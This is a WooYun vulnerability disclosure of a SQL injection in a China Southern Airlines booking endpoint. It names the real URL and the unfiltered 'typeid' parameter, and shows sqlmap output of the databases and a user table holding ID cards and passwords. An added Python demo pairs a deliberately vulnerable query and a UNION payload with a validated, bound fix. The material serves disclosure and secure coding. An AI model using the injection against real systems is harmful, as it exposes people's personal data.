WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
Disclosure timeline:
2013-06-18: Details sent to the vendor; awaiting vendor handling
2013-06-22: Vendor confirmed; details visible to the vendor only
2013-07-02: Details opened to core white hats and experts in the relevant field
2013-07-12: Details opened to regular white hats
2013-07-22: Details opened to intern white hats
2013-08-02: Details opened to the public

A China Southern Airlines sub-site has a SQL injection that exposes user information
http://b2c.csair.com/B2C40/data/order/importPNR/getPnrRules.xsql?typeid=1
Parameter: typeid is not filtered (the value is placed into the back-end query without validation, so the injection point is the typeid parameter in the URL above).

sqlmap output, enumerating the databases reachable through the injection:

available databases [6]:
[*] ECS
[*] ECS_REPORT
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] XDB

back-end DBMS: Oracle
Database: ECS
Table: USERDATA
[59 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| LANGUAGE       | VARCHAR2 |
| ABOUTME        | VARCHAR2 |
| ALIAS          | VARCHAR2 |
| ANSWER         | VARCHAR2 |
| ATTRIBUTE1     | VARCHAR2 |
| ATTRIBUTE2     | VARCHAR2 |
| ATTRIBUTE3     | VARCHAR2 |
| ATTRIBUTE4     | VARCHAR2 |
| ATTRIBUTE5     | VARCHAR2 |
| ATTRIBUTE6     | NUMBER   |
| ATTRIBUTE7     | NUMBER   |
| ATTRIBUTE8     | NUMBER   |
| BIRTHDATE      | DATE     |
| CELLPHONE      | VARCHAR2 |
| CHECKINAIRPORT | VARCHAR2 |
| CITY           | VARCHAR2 |
| CORP           | VARCHAR2 |
| COUNTRY        | VARCHAR2 |
| CREATEDATE     | DATE     |
| DEPARTMENTNAME | VARCHAR2 |
| ENDDATE        | DATE     |
| ENNAME         | VARCHAR2 |
| FAX            | VARCHAR2 |
| FLAG           | CHAR     |
| FPCARDNO       | VARCHAR2 |
| HOME           | VARCHAR2 |
| HOMEPHONE      | VARCHAR2 |
| IDCARD         | VARCHAR2 |
| INSERTDATE     | DATE     |
| ISEXTERNAL     | NUMBER   |
| LARGECLIENTNO  | VARCHAR2 |
| LASTLOGIN      | DATE     |
| LASTORDER      | DATE     |
| LASTUPDATE     | DATE     |
| LOCATION       | VARCHAR2 |
| MANAGERGUID    | VARCHAR2 |
| MEMBERID       | VARCHAR2 |
| NAME           | VARCHAR2 |
| OFFICE         | VARCHAR2 |
| OPENACCOUNT    | VARCHAR2 |
| OPENBANK       | VARCHAR2 |
| ORGUNITGUID    | VARCHAR2 |
| ORIGINAL       | CHAR     |
| ORIGINALID     | VARCHAR2 |
| PASSWORD       | VARCHAR2 |
| PASSWORDHINT   | VARCHAR2 |
| PICTUREURL     | VARCHAR2 |
| PRIORITYORDER  | NUMBER   |
| REGION         | VARCHAR2 |
| RTCNUMBER      | VARCHAR2 |
| SEX            | CHAR     |
| SIGNATUREURL   | VARCHAR2 |
| STATUS         | CHAR     |
| SUBSCIBEFLAG   | CHAR     |
| TITLE          | VARCHAR2 |
| USERGUID       | VARCHAR2 |
| WEBSITEURL     | VARCHAR2 |
| WORKMAIL       | VARCHAR2 |
| WORKPHONE      | VARCHAR2 |
+----------------+----------+

The USERDATA table holds member identity and contact data (NAME, IDCARD, CELLPHONE, HOMEPHONE, WORKMAIL, BIRTHDATE) together with PASSWORD and PASSWORDHINT columns, which is what makes this injection a user-information leak rather than a read of harmless reference data.
Fix suggestion: validate the submitted value (typeid should only ever be an integer; reject anything else) and pass it to the query as a bind variable instead of concatenating it into the SQL text.
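The following is an added example, not code from the WooYun report or from the affected site. It reconstructs the flaw described above (an unfiltered typeid concatenated into a query) and the suggested fix (validate, then bind). Assumptions: the report names Oracle as the back end, but sqlite3 is used here so the demo runs offline; the table contents, the PNRRULES table, the function names and the exact query shape are all constructed, because the report does not show the server-side code.

```python
"""Added example: unfiltered numeric parameter -> SQL injection, and the fix.

Assumptions (none of this is from the report): sqlite3 stands in for the
Oracle back end; PNRRULES and the rows below are constructed sample data;
the query shape and function names are hypothetical.
"""
from __future__ import annotations

import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in schema: a small rules table the endpoint would
    query, plus a USERDATA table (column names from the sqlmap dump) holding
    the sensitive data an attacker pivots to."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE PNRRULES (TYPEID INTEGER, RULE TEXT);
        INSERT INTO PNRRULES VALUES (1, 'rule for type 1'), (2, 'rule for type 2');
        CREATE TABLE USERDATA (MEMBERID TEXT, PASSWORD TEXT, IDCARD TEXT);
        INSERT INTO USERDATA VALUES ('member01', 'pw-hash-sample', 'idcard-sample');
        """
    )
    return conn


def get_pnr_rules_vulnerable(conn: sqlite3.Connection, typeid: str) -> list[str]:
    """Hypothetical reconstruction of the reported pattern: the raw request
    parameter is spliced into the SQL text, so the caller controls the query."""
    sql = f"SELECT RULE FROM PNRRULES WHERE TYPEID = {typeid}"
    return [row[0] for row in conn.execute(sql)]


def get_pnr_rules_fixed(conn: sqlite3.Connection, typeid: str) -> list[str]:
    """Hardened form: accept only a plain decimal integer, then pass it as a
    bind variable. Oracle drivers use ':name' placeholders where sqlite3 uses
    '?'; the principle (value never becomes part of the SQL text) is the same."""
    if re.fullmatch(r"[0-9]{1,9}", typeid) is None:
        raise ValueError("typeid must be a decimal integer")
    sql = "SELECT RULE FROM PNRRULES WHERE TYPEID = ?"
    return [row[0] for row in conn.execute(sql, (int(typeid),))]


def is_rejected(conn: sqlite3.Connection, typeid: str) -> bool:
    """True if the hardened endpoint refuses the input before touching SQL."""
    try:
        get_pnr_rules_fixed(conn, typeid)
    except ValueError:
        return True
    return False


# Constructed attack input: a UNION that pulls PASSWORD out of USERDATA.
UNION_PAYLOAD = "1 UNION ALL SELECT PASSWORD FROM USERDATA"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input :", get_pnr_rules_vulnerable(db, "1"))
    print("vulnerable, union payload:", get_pnr_rules_vulnerable(db, UNION_PAYLOAD))
    print("fixed, normal input      :", get_pnr_rules_fixed(db, "1"))
    print("fixed, union payload rejected:", is_rejected(db, UNION_PAYLOAD))
```

The vulnerable function returns the attacker's UNION row alongside the legitimate one, which is exactly the behaviour sqlmap automates when it enumerates databases and dumps USERDATA. The fixed function fails closed on anything that is not an integer, and even an integer is bound rather than concatenated, so a future change to a string-typed parameter would not reopen the hole.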
Severity: High
Vulnerability Rank: 12
Confirmed: 2013-06-22 21:37
None yet.